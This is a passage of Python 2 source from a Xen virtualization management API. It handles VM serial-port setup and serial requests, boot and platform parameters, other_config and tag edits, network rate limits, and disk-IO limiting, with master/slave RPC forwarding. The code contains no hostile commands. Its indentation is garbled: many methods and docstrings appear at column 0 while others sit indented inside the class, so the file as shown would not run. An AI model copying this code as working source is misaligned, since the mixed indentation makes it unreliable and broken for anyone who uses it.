        dom.info['HVM_boot_policy'] = 'BIOS order'
        return self._VM_save(dom)
# get serial path on host
def VM_get_platform_serial(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get Host TCP port of VM's platform serial.
@param session: session of RPC.
@param vm_ref: uuid
@return: True | False.
@rtype: dict.
'''
log.debug('VM get platform serial')
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_platform_serial(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_platform_serial', vm_ref)
else:
return self._VM_get_platform_serial(session, vm_ref)
# get serial devices in platform
def _VM_get_platform_serial(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get Host TCP port of VM's platform serial.
@param session: session of RPC.
@param vm_ref: uuid
@return: True | False.
@rtype: dict.
'''
# get serial file path
try:
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
plat = dom.get_platform()
value = plat.get('serial')
index = value.find('tcp:127.0.0.1:')
retv = ()
if index != -1:
port = value[index+14:19]
retv = ('127.0.0.1', port)
return xen_api_success(retv)
except Exception, exn:
log.exception(exn)
return xen_api_error('get serial path failed')
# set serial devices in platform
# eg: serial pipe:/tmp/fifotest
    def VM_set_platform_serial(self, session, vm_ref):
        '''
        @author: wuyuewen
        @summary: Auto find and set a vailed Host TCP port to VM's platform serial,
                    the port range is 14000-15000, see PORTS_FOR_SERIAL.
        @param session: session of RPC.
        @param vm_ref: uuid
        @return: True | False.
        @rtype: dict.
        @raise xen_api_error:
        '''
        log.debug('VM_set_platform_serial')
        # Master/slave dispatch: run locally when this host owns the VM,
        # otherwise forward to the owning host over RPC.
        if BNPoolAPI._isMaster:
            host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
            if cmp(host_ref, XendNode.instance().uuid) == 0:
                return self._VM_set_platform_serial(session, vm_ref)
            else:
                remote_ip = BNPoolAPI.get_host_ip(host_ref)
                return xen_rpc_call(remote_ip, 'VM_set_platform_serial', vm_ref)
        else:
            return self._VM_set_platform_serial(session, vm_ref)
# set serial devices in platform
    def _VM_set_platform_serial(self, session, vm_ref):
        '''
        @author: wuyuewen
        @summary: Internal method. Auto find and set a vailed Host TCP port to VM's platform serial,
                    the port range is 14000-15000, see PORTS_FOR_SERIAL.
        @param session: session of RPC.
        @param vm_ref: uuid
        @return: True | False.
        @rtype: dict.
        @raise xen_api_error:
        '''
        # get serial file path
        # save in the same path with boot vbd
        try:
            xennode = XendNode.instance()
            # A valid system-VDI path is required before a serial can be set.
            sysvdi_path = xennode.get_sysvdi_path_by_vm(vm_ref)
            if sysvdi_path == '':
                log.debug('Invalid system vdi path in vm_ref: %s' % vm_ref)
                return xen_api_error("Invalid system vdi path")
            dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
            # Pick a free TCP port and point qemu's serial at it; 'server,nowait'
            # makes qemu listen without blocking domain start-up.
            avail_port = dom.get_free_port()
            serial_value = 'tcp:127.0.0.1:%s,server,nowait' % avail_port
            log.debug('set serial value: %s' % serial_value)
            plat = dom.get_platform()
            plat['serial'] = serial_value
            dom.info['platform'] = plat
            return self._VM_save(dom)
        except Exception, exn:
            log.debug(exn)
            return xen_api_error('create serial failed')
    def VM_send_request_via_serial(self, session, vm_ref, json_obj, flag):
        '''
        @author: wuyuewen
        @summary: Send a request into VM's system use serial device.
        @precondition: VM is running, has a serial device, already installed a serial Agent in VM's system.
        @param session: session of RPC.
        @param vm_ref: uuid
        @param json_obj: serial request value use json object.
        @param flag: True | False, do/don't checkout whether serial Agent is running in VM or not.
        @return: True | False.
        @rtype: dict.
        '''
        log.debug('VM send request via serial')
        # Master/slave dispatch: local call when this host owns the VM,
        # otherwise RPC to the owning host.
        if BNPoolAPI._isMaster:
            host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
            if cmp(host_ref, XendNode.instance().uuid) == 0:
                return self._VM_send_request_via_serial(session, vm_ref, json_obj, flag)
            else:
                remote_ip = BNPoolAPI.get_host_ip(host_ref)
                return xen_rpc_call(remote_ip, 'VM_send_request_via_serial', vm_ref, json_obj, flag)
        else:
            return self._VM_send_request_via_serial(session, vm_ref, json_obj, flag)
    def _VM_send_request_via_serial(self, session, vm_ref, json_obj, flag):
        '''
        @author: wuyuewen
        @summary: Internal method. Send a request into VM's system use serial device.
        @precondition: VM is running, has a serial device, already installed a serial Agent in VM's system.
        @param session: session of RPC.
        @param vm_ref: uuid
        @param json_obj: serial request value use json object.
        @param flag: True | False, do/don't checkout whether serial Agent is running in VM or not.
        @return: True | False.
        @rtype: dict.
        '''
        try:
            # Resolve the (ip, port) the VM's serial device listens on.
            response = self._VM_get_platform_serial(session, vm_ref)
            if cmp(response['Status'], 'Failure') == 0:
                return xen_api_success(False)
            address = response.get('Value')
            if not address:
                log.error('VM serial not correct!')
                return xen_api_success(False)
            (ip, port) = address
            # Netctl performs the actual write over the TCP serial channel.
            retv = Netctl.serial_opt(ip, port, json_obj, flag)
            if retv:
                return xen_api_success(True)
            else:
                return xen_api_success(False)
        except Exception ,exn:
            log.exception(exn)
            return xen_api_success(False)
# edit by wufan
def VM_set_HVM_boot_policy(self, session, vm_ref, value):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_HVM_boot_policy(session, vm_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_HVM_boot_policy', vm_ref, value)
else:
return self._VM_set_HVM_boot_policy(session, vm_ref, value)
    def _VM_set_HVM_boot_policy(self, session, vm_ref, value):
        '''
        @deprecated: not used
        @summary: Store the HVM boot policy; only "" and "BIOS order" are accepted.
        '''
        if value != "" and value != "BIOS order":
            return xen_api_error(
                ['VALUE_NOT_SUPPORTED', 'VM.HVM_boot_policy', value,
                 'Xend supports only the "BIOS order" boot policy.'])
        else:
            return self.VM_set('HVM_boot_policy', session, vm_ref, value)
    def VM_set_HVM_boot_params(self, session, vm_ref, value):
        '''
        @deprecated: not used
        @summary: Master/slave dispatcher for _VM_set_HVM_boot_params.
        '''
        # Local call when this host owns the VM, otherwise RPC forward.
        if BNPoolAPI._isMaster:
            host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
            if cmp(host_ref, XendNode.instance().uuid) == 0:
                return self._VM_set_HVM_boot_params(session, vm_ref, value)
            else:
                remote_ip = BNPoolAPI.get_host_ip(host_ref)
                return xen_rpc_call(remote_ip, 'VM_set_HVM_boot_params', vm_ref, value)
        else:
            return self._VM_set_HVM_boot_params(session, vm_ref, value)
    def _VM_set_HVM_boot_params(self, session, vm_ref, value):
        '''
        @deprecated: not used
        @summary: Overwrite the whole HVM_boot_params dict of a VM.
        '''
        return self.VM_set('HVM_boot_params', session, vm_ref, value)
    def VM_add_to_HVM_boot_params(self, session, vm_ref, key, value):
        '''
        @deprecated: not used
        @summary: Master/slave dispatcher for _VM_add_to_HVM_boot_params.
        '''
        # Local call when this host owns the VM, otherwise RPC forward.
        if BNPoolAPI._isMaster:
            host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
            if cmp(host_ref, XendNode.instance().uuid) == 0:
                return self._VM_add_to_HVM_boot_params(session, vm_ref, key, value)
            else:
                remote_ip = BNPoolAPI.get_host_ip(host_ref)
                return xen_rpc_call(remote_ip, 'VM_add_to_HVM_boot_params', vm_ref, key, value)
        else:
            return self._VM_add_to_HVM_boot_params(session, vm_ref, key, value)
def _VM_add_to_HVM_boot_params(self, session, vm_ref, key, value):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if 'HVM_boot_params' not in dom.info:
dom.info['HVM_boot_params'] = {}
dom.info['HVM_boot_params'][key] = value
return self._VM_save(dom)
    def VM_remove_from_HVM_boot_params(self, session, vm_ref, key):
        '''
        @deprecated: not used
        @summary: Master/slave dispatcher for _VM_remove_from_HVM_boot_params.
        '''
        # Local call when this host owns the VM, otherwise RPC forward.
        if BNPoolAPI._isMaster:
            host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
            if cmp(host_ref, XendNode.instance().uuid) == 0:
                return self._VM_remove_from_HVM_boot_params(session, vm_ref, key)
            else:
                remote_ip = BNPoolAPI.get_host_ip(host_ref)
                return xen_rpc_call(remote_ip, 'VM_remove_from_HVM_boot_params', vm_ref, key)
        else:
            return self._VM_remove_from_HVM_boot_params(session, vm_ref, key)
    def _VM_remove_from_HVM_boot_params(self, session, vm_ref, key):
        '''
        @deprecated: not used
        @summary: Remove one entry from a VM's HVM_boot_params if present.
        '''
        dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
        if 'HVM_boot_params' in dom.info \
               and key in dom.info['HVM_boot_params']:
            del dom.info['HVM_boot_params'][key]
            return self._VM_save(dom)
        else:
            # Key absent: treat as success, nothing to persist.
            return xen_api_success_void()
    def VM_set_PV_bootloader(self, session, vm_ref, value):
        '''
        @deprecated: not used
        @summary: Store the PV bootloader name for the VM.
        '''
        return self.VM_set('PV_bootloader', session, vm_ref, value)
    def VM_set_PV_kernel(self, session, vm_ref, value):
        '''
        @deprecated: not used
        @summary: Store the PV kernel path for the VM.
        '''
        return self.VM_set('PV_kernel', session, vm_ref, value)
    def VM_set_PV_ramdisk(self, session, vm_ref, value):
        '''
        @deprecated: not used
        @summary: Store the PV ramdisk path for the VM.
        '''
        return self.VM_set('PV_ramdisk', session, vm_ref, value)
    def VM_set_PV_args(self, session, vm_ref, value):
        '''
        @deprecated: not used
        @summary: Store the PV kernel command-line arguments for the VM.
        '''
        return self.VM_set('PV_args', session, vm_ref, value)
    def VM_set_PV_bootloader_args(self, session, vm_ref, value):
        '''
        @deprecated: not used
        @summary: Store the PV bootloader arguments for the VM.
        '''
        return self.VM_set('PV_bootloader_args', session, vm_ref, value)
    def VM_set_platform(self, session, vm_ref, value):
        '''
        @deprecated: not used
        @summary: Overwrite the whole platform dict of a VM.
        '''
        return self.VM_set('platform', session, vm_ref, value)
# edit by wufan
def VM_add_to_platform(self, session, vm_ref, key, value):
'''
@author: wuyuewen
@summary: Change a attribute in VM paltform.
@precondition: VM not running, key exists in platform field.
@param session: session of RPC.
@param vm_ref: uuid
@param key: attribute in VM platform field.
@param value: value to change.
@return: True | False.
@rtype: dict.
@raise xen_api_error: key error
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_add_to_platform(session, vm_ref, key, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_add_to_platform', vm_ref, key, value)
else:
return self._VM_add_to_platform(session, vm_ref, key, value)
    def _VM_add_to_platform(self, session, vm_ref, key, value):
        '''
        @author: wuyuewen
        @summary: Internal method. Change a attribute in VM paltform.
        @precondition: VM not running, key exists in platform field.
        @param session: session of RPC.
        @param vm_ref: uuid
        @param key: attribute in VM platform field.
        @param value: value to change.
        @return: True | False.
        @rtype: dict.
        @raise xen_api_error: key error
        '''
        try:
            dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
            # Read-modify-write: mutate the platform dict and store it back.
            plat = dom.get_platform()
            plat[key] = value
            return self.VM_set_platform(session, vm_ref, plat)
        except KeyError:
            return xen_api_error(['key error', vm_ref, key])
    def VM_remove_from_platform(self, session, vm_ref, key):
        '''
        @deprecated: not used
        @summary: Remove one attribute from the VM's platform dict if present.
        '''
        dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
        plat = dom.get_platform()
        if key in plat:
            del plat[key]
            return self.VM_set_platform(session, vm_ref, plat)
        else:
            # Key absent: nothing to do, report success.
            return xen_api_success_void()
def VM_set_other_config(self, session, vm_ref, value):
'''
@author: wuyuewen
@summary: Set VM other config field.
@param session: session of RPC.
@param vm_ref: uuid
@param value: a dict structure of other config.
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_other_config(session, vm_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_other_config', vm_ref, value)
else:
return self._VM_set_other_config(session, vm_ref, value)
    def _VM_set_other_config(self, session, vm_ref, value):
        '''
        @author: wuyuewen
        @summary: Internal method. Set VM other config field.
        @param session: session of RPC.
        @param vm_ref: uuid
        @param value: a dict structure of other config.
        @return: True | False.
        @rtype: dict.
        '''
        return self.VM_set('other_config', session, vm_ref, value)
    def VM_add_to_other_config(self, session, vm_ref, key, value):
        '''
        @author: wuyuewen
        @summary: Add a attribute to VM other config field.
        @param session: session of RPC.
        @param vm_ref: uuid
        @param key: attribute key.
        @param value: attribute value.
        @return: True | False.
        @rtype: dict.
        '''
        # Local call when this host owns the VM, otherwise RPC forward.
        if BNPoolAPI._isMaster:
            host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
            if cmp(host_ref, XendNode.instance().uuid) == 0:
                return self._VM_add_to_other_config(session, vm_ref, key, value)
            else:
                remote_ip = BNPoolAPI.get_host_ip(host_ref)
                return xen_rpc_call(remote_ip, 'VM_add_to_other_config', vm_ref, key, value)
        else:
            return self._VM_add_to_other_config(session, vm_ref, key, value)
def _VM_add_to_other_config(self, session, vm_ref, key, value):
'''
@author: wuyuewen
@summary: Interal method. Add a attribute to VM other config field.
@param session: session of RPC.
@param vm_ref: uuid
@param key: attribute key.
@param value: attribute value.
@return: True | False.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if dom and 'other_config' in dom.info:
dom.info['other_config'][key] = value
return self._VM_save(dom)
    def VM_add_tags(self, session, vm_ref, value):
        '''
        @deprecated: not used
        @summary: Master/slave dispatcher for _VM_add_tags.
        '''
        # Local call when this host owns the VM, otherwise RPC forward.
        if BNPoolAPI._isMaster:
            host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
            if cmp(host_ref, XendNode.instance().uuid) == 0:
                return self._VM_add_tags(session, vm_ref, value)
            else:
                remote_ip = BNPoolAPI.get_host_ip(host_ref)
                return xen_rpc_call(remote_ip, 'VM_add_tags', vm_ref, value)
        else:
            return self._VM_add_tags(session, vm_ref, value)
    def _VM_add_tags(self, session, vm_ref, value):
        '''
        @deprecated: not used
        @summary: Append a tag to the VM's tags list and persist the config.
        '''
        dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
        # NOTE(review): when the VM has no 'tags' field this method falls
        # through and returns None rather than an API dict — confirm whether
        # callers tolerate that.
        if dom and 'tags' in dom.info:
            dom.info['tags'].append(value)
            return self._VM_save(dom)
    def VM_set_tags(self, session, vm_ref, value):
        '''
        @deprecated: not used
        @summary: Master/slave dispatcher for _VM_set_tags.
        '''
        # Local call when this host owns the VM, otherwise RPC forward.
        if BNPoolAPI._isMaster:
            host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
            if cmp(host_ref, XendNode.instance().uuid) == 0:
                return self._VM_set_tags(session, vm_ref, value)
            else:
                remote_ip = BNPoolAPI.get_host_ip(host_ref)
                return xen_rpc_call(remote_ip, 'VM_set_tags', vm_ref, value)
        else:
            return self._VM_set_tags(session, vm_ref, value)
    def _VM_set_tags(self, session, vm_ref, value):
        '''
        @deprecated: not used
        @summary: Overwrite the VM's tags list.
        '''
        return self.VM_set('tags', session, vm_ref, value)
    def _VM_update_rate(self, session, vm_ref, type, vif_refs):
        '''
        @deprecated: not used
        @summary: Prune stale per-NIC entries from other_config[type]: keep
        only the entries whose "ethN" number matches one of the given VIFs.
        @param type: other_config sub-dict name, e.g. 'rate' or 'tag'.
        '''
        # Collect the eth numbers of the VIFs that still exist.
        eth_list = []
        for vif_ref in vif_refs:
            device = self.VIF_get_device(session, vif_ref).get('Value')
            if device != '' and device.startswith('eth'):
                eth_num = device[3:]
                eth_list.append(eth_num)
        xd = XendDomain.instance()
        dominfo = xd.get_vm_by_uuid(vm_ref)
        final_tag_list = {}
        try:
            other_config = self.VM_get_other_config( session, vm_ref).get('Value')
            if other_config:
                tag_list = other_config.get(type, {})
                if tag_list and isinstance(tag_list, dict):
                    # Keep only entries for still-present NICs.
                    for key, value in tag_list.items():
                        if key in eth_list:
                            final_tag_list[key] = value
                dominfo.info['other_config'][type] = final_tag_list
                self._VM_save(dominfo)
            log.debug('VM_update_%s' % type)
            return xen_api_success_void()
        except Exception, exn:
            log.exception(exn)
            # Best-effort: errors are logged and the call still reports success.
            return xen_api_success_void()
#add by wufan
def _VM_update_tag(self, session, vm_ref, vif_refs):
'''
@deprecated: not used
'''
eth_list = []
for vif_ref in vif_refs:
device = self.VIF_get_device(session, vif_ref).get('Value')
if device != '' and device.startswith('eth'):
eth_num = device[3:]
eth_list.append(eth_num)
#log.debug("--------------->eth list:%s" % eth_list)
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
final_tag_list = {}
try:
other_config = self.VM_get_other_config( session, vm_ref).get('Value')
#log.debug('VM update tag')
if other_config:
tag_list = other_config.get('tag', {})
if tag_list and isinstance(tag_list, dict):
for key, value in tag_list.items():
if key in eth_list:
final_tag_list[key] = value
dominfo.info['other_config']['tag'] = final_tag_list
self._VM_save(dominfo)
log.debug('VM_update_tag')
return xen_api_success_void()
except Exception, exn:
log.exception(exn)
return xen_api_success_void()
#add by wufan
    def VM_set_all_rate(self, session, vm_ref, param_type, tag_list=None):
        '''
        @author: wuyuewen
        @summary: Set all VIF's rate and burst limit controlled by OVS,
                    this attribute stored in VM's other_config field.
        @param session: session of RPC.
        @param vm_ref: uuid
        @param param_type: rate/burst, rate is the rate(kbps) of VIF port controlled by OVS,
                            burst(kbps) is the volatility overhead rate.
        @param tag_list: dict of rate for each VIF, the structure is {eth_num : rate}, e.g. {0:1000, 1:1000}
        @return: True | False.
        @rtype: dict.
        '''
        # Local call when this host owns the VM, otherwise RPC forward.
        if BNPoolAPI._isMaster:
            host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
            if cmp(host_ref, XendNode.instance().uuid) == 0:
                return self._VM_set_all_rate(session, vm_ref, param_type, tag_list)
            else:
                remote_ip = BNPoolAPI.get_host_ip(host_ref)
                return xen_rpc_call(remote_ip, 'VM_set_all_rate', vm_ref, param_type, tag_list)
        else:
            return self._VM_set_all_rate(session, vm_ref, param_type, tag_list)
#add by wufan
    def _VM_set_all_rate(self, session, vm_ref, type, tag_list=None):
        '''
        @author: wuyuewen
        @summary: Internal method. Set all VIF's rate and burst limit controlled by OVS,
                    this attribute stored in VM's other_config field.
        @param session: session of RPC.
        @param vm_ref: uuid
        @param type: rate/burst, rate is the rate(kbps) of VIF port controlled by OVS,
                            burst(kbps) is the volatility overhead rate.
        @param tag_list: dict of rate for each VIF, the structure is {eth_num : rate}, e.g. {0:1000, 1:1000}
        @return: True | False.
        @rtype: dict.
        '''
        log.debug('set vm all type: %s' % type)
        if tag_list is None:
            # No explicit rates given: re-apply each VIF's currently stored
            # value, then prune entries for NICs that no longer exist.
            xd = XendDomain.instance()
            dominfo = xd.get_vm_by_uuid(vm_ref)
            vif_refs = self._VM_get_VIFs(session, vm_ref).get('Value')
            for vif_ref in vif_refs:
                tag = self._VM_get_rate(session, vm_ref, type, vif_ref).get('Value')
                self._VM_set_rate( session, vm_ref, type, vif_ref, tag)
            self._VM_update_rate(session, vm_ref, type, vif_refs)
        else:
            # Explicit {eth_num: rate} mapping supplied by the caller.
            for eth_num, tag in tag_list.items():
                self._VM_set_rate_by_ethnum(session, vm_ref, type, eth_num, tag)
        return xen_api_success_void()
    def VM_get_dev2path_list(self, session, vm_ref):
        '''
        @deprecated: not used
        @summary: Master/slave dispatcher for _VM_get_dev2path_list; wraps the
        plain dict result in a xen_api success dict.
        '''
        if BNPoolAPI._isMaster:
            host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
            if cmp(host_ref, XendNode.instance().uuid) == 0:
                return xen_api_success(self._VM_get_dev2path_list(session, vm_ref))
            else:
                remote_ip = BNPoolAPI.get_host_ip(host_ref)
                return xen_rpc_call(remote_ip, 'VM_get_dev2path_list', vm_ref)
        else:
            return xen_api_success(self._VM_get_dev2path_list(session, vm_ref))
    '''
    Map each disk device name to its image path.
    return: {dev: img_path}
    e.g.:
    {'hda': '/home/sr_mount/2133.vhd'}
    '''
def _VM_get_dev2path_list(self, session, vm_ref):
'''
@deprecated: not used
'''
storage = self._get_BNStorageAPI_instance()
dev2path_list = {}
vbd_refs = self._VM_get_VBDs(session, vm_ref).get('Value')
for vbd_ref in vbd_refs:
if self._VBD_get(vbd_ref, 'type').get('Value').lower() == 'disk':
dev = self._VBD_get(vbd_ref, 'device').get('Value')
# vdi_ref = self._VBD_get(vbd_ref, 'VDI').get('Value')
location = self._VBD_get(vbd_ref, 'uname').get('Value')
# location = storage._get_VDI(vdi_ref).location
dev2path_list[dev] = location
log.debug('_VM_get_dev2path_list')
log.debug(dev2path_list)
return dev2path_list
# when VM start ,async call to find IO pid
    def VM_start_set_IO_limit(self, session, vm_ref, io_limit_list={}):
        '''
        @author: wuyuewen
        @summary: Internal method. Kick off disk-IO limiting after a VM start:
        dispatches VM_start_init_pid2dev to the host that owns the VM.
        @param io_limit_list: optional {'<type>_<unit>': value} limits, e.g.
        {'read_MBps': 10}; empty means "re-apply the stored limits".
        '''
        # NOTE(review): mutable default argument ({}) — harmless here because
        # it is never mutated, but callers should not rely on it.
        if BNPoolAPI._isMaster:
            host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
            if cmp(host_ref, XendNode.instance().uuid) == 0:
                return XendTask.log_progress(0, 100,
                                     self.VM_start_init_pid2dev, session, vm_ref, io_limit_list)
            else:
                remote_ip = BNPoolAPI.get_host_ip(host_ref)
                return xen_rpc_call(remote_ip, 'VM_start_init_pid2dev', vm_ref, io_limit_list)
        else:
            return XendTask.log_progress(0, 100,
                                 self.VM_start_init_pid2dev, session, vm_ref, io_limit_list)
# local call, called in VM_start_set_IO_limit
    def VM_start_init_pid2dev(self, session, vm_ref, io_limit_list):
        '''
        @author: wuyuewen
        @summary: Internal method. After a VM starts, wait for its domain id
        and IO pids to appear (up to 5 tries, 2s apart each), then apply the
        requested disk-IO limits — either the explicit io_limit_list or the
        limits stored in the VM's config.
        '''
        log.debug('VM_start_init_start_pid2dev')
        # Poll for the domain id; '-1' means the domain is not up yet.
        max_count = 0
        while True and max_count < 5:
            max_count += 1
            dom_id = self._VM_get_domid('', vm_ref).get('Value')
            if dom_id and dom_id != '-1':
                break
            time.sleep(2)
        if not dom_id:
            log.exception('Init pid2dev failed, dom id is None!')
            return xen_api_success_void()
        # Poll for the IO-serving pids of the domain.
        max_count = 0
        while True and max_count < 5:
            max_count += 1
            pid2dev_list = XendIOController.get_VM_pid2dev(dom_id)
            if pid2dev_list:
                break
            time.sleep(2)
        log.debug('get pid2dev_list:')
        log.debug(pid2dev_list)
#        self._VM_init_pid2devnum_list(session, vm_ref)
        if io_limit_list:
            # Explicit limits: keys are '<type>_<unit>', e.g. 'read_MBps'.
            for k, v in io_limit_list.items():
                (type, io_unit) = k.split('_')
                log.debug('Set disk io rate, type: %s %s, value: %s' % (type, io_unit, v))
                self._VM_set_IO_rate_limit(session, vm_ref, type, v, io_unit)
        else:
            # No explicit limits: re-apply whatever is stored ('-1' = no limit).
            for type in ['read', 'write']:
                for io_unit in ['MBps', 'iops']:
                    rate = self._VM_get_IO_rate_limit(session, vm_ref, type, io_unit).get('Value')
                    if rate != '-1':
                        log.debug('Set disk io rate, type: %s %s, value: %s' % (type, io_unit, rate))
                        self._VM_set_IO_rate_limit(session, vm_ref, type, rate, io_unit)
        return xen_api_success_void()
    '''Get {VM_pid1: (major, minor1), VM_pid2: (major, minor2)}
    and cache the result in memory.
    Call this function when starting or migrating the VM.
    '''
def VM_init_pid2devnum_list(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_init_pid2devnum_list(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_init_pid2devnum_list', vm_ref)
else:
return self._VM_init_pid2devnum_list(session, vm_ref)
    def _VM_init_pid2devnum_list(self, session, vm_ref):
        '''
        @deprecated: not used
        @summary: Compute the VM's {pid: (major, minor)} device-number map
        from its disk layout and cache it in other_config['pid2dev'].
        '''
        log.debug("VM_init_pid2devnum_list")
        dev2path_list = self._VM_get_dev2path_list(session, vm_ref)
        dom_id = self._VM_get_domid('', vm_ref).get('Value')
        pid2devnum_list = XendIOController.get_VM_pid2num(dom_id, dev2path_list)
        return self._VM_set_pid2devnum_list(session, vm_ref, pid2devnum_list)
#clear old pid2devnum_list before set
    def _VM_set_pid2devnum_list(self, session, vm_ref, pid2devnum_list):
        '''
        @deprecated: not used
        @summary: Replace the cached other_config['pid2dev'] map with the
        given {pid: devnum} entries and persist the config.
        '''
        xd = XendDomain.instance()
        dominfo = xd.get_vm_by_uuid(vm_ref)
        domname = dominfo.getName()
        log.debug('Set vm(%s) pid2devnum:' %(domname))
        log.debug(pid2devnum_list)
        dominfo.info.setdefault('other_config',{})
        dominfo.info['other_config']['pid2dev'] = {} #clear pid2dev_list
        for pid, devnum in pid2devnum_list.items():
            dominfo.info['other_config']['pid2dev'][pid] = devnum
        self._VM_save(dominfo)
        return xen_api_success(dominfo.info['other_config']['pid2dev'])
    def VM_clear_pid2devnum_list(self, session, vm_ref):
        '''
        @deprecated: not used
        @summary: Master/slave dispatcher for _VM_clear_pid2devnum_list.
        '''
        # Local call when this host owns the VM, otherwise RPC forward.
        if BNPoolAPI._isMaster:
            host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
            if cmp(host_ref, XendNode.instance().uuid) == 0:
                return self._VM_clear_pid2devnum_list(session, vm_ref)
            else:
                remote_ip = BNPoolAPI.get_host_ip(host_ref)
                return xen_rpc_call(remote_ip, 'VM_clear_pid2devnum_list', vm_ref)
        else:
            return self._VM_clear_pid2devnum_list(session, vm_ref)
    def _VM_clear_pid2devnum_list(self, session, vm_ref):
        '''
        @deprecated: not used
        @summary: Drop the cached other_config['pid2dev'] map (if any) and
        persist the config.
        '''
        xd = XendDomain.instance()
        dominfo = xd.get_vm_by_uuid(vm_ref)
        domname = dominfo.getName()
        log.debug('clear vm(%s) pid2devnum:' %(domname))
        if dominfo.info.get('other_config', {}) and \
            'pid2dev' in dominfo.info['other_config']:
            del dominfo.info['other_config']['pid2dev']
            self._VM_save(dominfo)
        return xen_api_success_void()
    def VM_get_pid2devnum_list(self, session, vm_ref):
        '''
        @deprecated: not used
        @summary: Master/slave dispatcher for _VM_get_pid2devnum_list.
        '''
        # Local call when this host owns the VM, otherwise RPC forward.
        if BNPoolAPI._isMaster:
            host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
            if cmp(host_ref, XendNode.instance().uuid) == 0:
                return self._VM_get_pid2devnum_list(session, vm_ref)
            else:
                remote_ip = BNPoolAPI.get_host_ip(host_ref)
                return xen_rpc_call(remote_ip, 'VM_get_pid2devnum_list', vm_ref)
        else:
            return self._VM_get_pid2devnum_list(session, vm_ref)
    def _VM_get_pid2devnum_list(self, session, vm_ref):
        '''
        @deprecated: not used
        @summary: Return the cached other_config['pid2dev'] map; rebuild it
        from the running domain when the cache is empty.
        '''
        try:
            pid2num_list = {}
            other_config = self._VM_get_other_config(session, vm_ref).get('Value')
            if other_config:
                pid2num_list = other_config.get('pid2dev',{})
            #if can't get from memory, the excute cmd
            if not pid2num_list:
                log.debug("cant't get pid2devnum_list from memory, execute cmd")
                pid2num_list = self._VM_init_pid2devnum_list(session, vm_ref).get('Value')
            log.debug(pid2num_list)
            return xen_api_success(pid2num_list)
        except Exception, exn:
            log.exception(exn)
            # pid2num_list was initialised first inside the try, so it is
            # always bound here (possibly {}).
            return xen_api_success(pid2num_list)
    def VM_get_vbd2device_list(self, session, vm_ref):
        '''
        @deprecated: not used
        @summary: Master/slave dispatcher for _VM_get_vbd2device_list.
        '''
        # Local call when this host owns the VM, otherwise RPC forward.
        if BNPoolAPI._isMaster:
            host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
            if cmp(host_ref, XendNode.instance().uuid) == 0:
                return self._VM_get_vbd2device_list(session, vm_ref)
            else:
                remote_ip = BNPoolAPI.get_host_ip(host_ref)
                return xen_rpc_call(remote_ip, 'VM_get_vbd2device_list', vm_ref)
        else:
            return self._VM_get_vbd2device_list(session, vm_ref)
    def _VM_get_vbd2device_list(self, session, vm_ref):
        '''
        @deprecated: not used
        @summary: Return the cached other_config['vbd2device'] map ({} when absent).
        '''
        try:
            vbd2device_list = {}
            other_config = self._VM_get_other_config(session, vm_ref).get('Value')
            if other_config:
                vbd2device_list = other_config.get('vbd2device',{})
            return xen_api_success(vbd2device_list)
        except Exception, exn:
            log.exception(exn)
            # vbd2device_list is bound on the first line of the try.
            return xen_api_success(vbd2device_list)
    '''
    type: read | write
    flag = True: execute the cgroup command
    flag = False: just set the value in the config file
    '''
    def VM_set_IO_rate_limit(self, session, vm_ref, type, value, io_unit):
        '''
        @author: wuyuewen
        @summary: Set VM disk IO rate by cgroup, can set both read/write rate.
        @param session: session of RPC.
        @param vm_ref: uuid
        @param type: read/write.
        @param value: rate limit value (in io_unit units).
        @param io_unit: MBps | iops
        @return: True | False.
        @rtype: dict.
        '''
        # Local call when this host owns the VM, otherwise RPC forward.
        if BNPoolAPI._isMaster:
            host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
